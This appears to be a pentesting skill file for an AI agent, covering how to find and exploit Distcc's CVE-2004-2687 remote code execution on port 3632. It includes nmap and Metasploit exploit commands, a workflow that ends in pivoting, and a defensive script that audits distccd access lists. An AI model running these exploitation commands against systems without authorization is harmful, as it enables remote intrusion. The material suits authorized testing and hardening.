Hacktricks-skills distcc-pentest

How to identify and exploit Distcc vulnerabilities on port 3632. Use this skill whenever the user mentions Distcc, port 3632, distributed compilation, or needs to test for CVE-2004-2687. Make sure to use this skill for any network service enumeration that reveals port 3632, or when the user wants to check for remote code execution via Distcc misconfigurations.

Install

Clone the upstream repo:

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/network-services-pentesting/3632-pentesting-distcc/SKILL.MD

Distcc Pentesting

A skill for identifying and exploiting Distcc vulnerabilities, particularly CVE-2004-2687, which allows remote code execution.

What is Distcc?

Distcc is a distributed compilation tool that uses idle processing power from other computers on the network. A misconfigured Distcc daemon can allow attackers to execute arbitrary code on the system that runs it.

Default port: 3632/tcp

When to Use This Skill

Use this skill when:

  • Port 3632 is open during network enumeration
  • You need to test for Distcc vulnerabilities
  • You want to check for CVE-2004-2687
  • You're assessing distributed compilation services
  • You need to verify if a Distcc daemon is vulnerable to RCE

Quick Start

1. Identify Distcc Service

# Check if port 3632 is open
nmap -p 3632 <target-ip>

# Banner grab to confirm Distcc
nc -v <target-ip> 3632

2. Test for CVE-2004-2687

This vulnerability allows arbitrary command execution on the Distcc server.

Using Nmap script:

nmap -p 3632 <target-ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Using Metasploit:

msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS <target-ip>
set PAYLOAD <payload>
exploit

3. Manual Exploitation

If you don't have Metasploit, you can test manually:

# Test if the service accepts commands
echo "id" | nc <target-ip> 3632

# Try to compile a test file (if vulnerable)
distcc -m <target-ip> --show-version

Exploitation Workflow

  1. Enumerate: Confirm port 3632 is open and running Distcc
  2. Test: Run the CVE-2004-2687 check to see if it's vulnerable
  3. Exploit: If vulnerable, use Metasploit or manual methods to gain code execution
  4. Pivot: Use the compromised host for further network access

Important Notes

  • CVE-2004-2687 is the primary vulnerability to check for
  • The vulnerability allows arbitrary command execution
  • Many older systems still have this vulnerability unpatched
  • Distcc is often found in development environments
  • Always have proper authorization before testing
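
The misconfiguration behind CVE-2004-2687 is a distccd daemon that does not restrict which clients may submit jobs. As an added example (not part of the original skill), the script below classifies distccd command lines by their --allow/-a and --listen options, which are the only options it interprets; the sample command lines are constructed.

```sh
# Added example, not from the original skill: classify how widely a distccd
# daemon accepts compile jobs, judging only by its command line.
# Only --allow/-a and --listen are interpreted.

audit_distccd() (
    # $1 = one distccd command line, e.g. a line of `ps -eo args` output
    set -f                      # split on spaces without glob expansion
    prev= kind= listen= widest= review=
    for tok in $1; do
        val=
        case $prev in
            --allow|-a) val=$tok kind=allow ;;
            --listen)   val=$tok kind=listen ;;
        esac
        case $tok in
            --allow=*)  val=${tok#*=} kind=allow ;;
            --listen=*) val=${tok#*=} kind=listen ;;
        esac
        prev=$tok
        if [ -z "$val" ]; then continue; fi
        if [ "$kind" = listen ]; then listen=$val; continue; fi
        case $val in
            */*) bits=${val#*/} ;;
            *)   bits=32 ;;     # bare address: a single host
        esac
        case $bits in
            ''|*[!0-9]*) review=$val ;;    # mask is not a bit count
            *) if [ -z "$widest" ] || [ "$bits" -lt "$widest" ]; then
                   widest=$bits
               fi ;;
        esac
    done
    if [ "$listen" = 127.0.0.1 ]; then echo "LOCAL listens on loopback only"
    elif [ -n "$review" ]; then echo "REVIEW cannot interpret mask in $review"
    elif [ -z "$widest" ]; then echo "OPEN no --allow option"
    elif [ "$widest" -eq 0 ]; then echo "OPEN an --allow range matches every client"
    else echo "RESTRICTED widest allowed range is /$widest"
    fi
)

# Constructed sample command lines.
for cmd in \
    "distccd --daemon" \
    "distccd --daemon --allow 0.0.0.0/0" \
    "distccd --daemon --allow 10.20.30.0/24 -a 10.20.31.7" \
    "distccd --daemon --listen 127.0.0.1"
do
    printf '%-55s -> %s\n' "$cmd" "$(audit_distccd "$cmd")"
done
```

Any line reported as OPEN or REVIEW is a daemon whose access list should be narrowed to the build hosts that actually need it.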

Resources

Common Commands Reference

# Quick vulnerability check
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

# Full scan with service detection
nmap -sV -p 3632 <ip>

# Metasploit exploitation
msfconsole -q -x "use exploit/unix/misc/distcc_exec; set RHOSTS <ip>; exploit"

Safety & Authorization

⚠️ Always ensure you have explicit authorization before testing Distcc services. Unauthorized exploitation of Distcc vulnerabilities is illegal and can result in severe legal consequences.

This skill is intended for:

  • Authorized penetration testing engagements
  • Security assessments with written permission
  • Educational purposes in controlled environments
  • Bug bounty programs where Distcc is in scope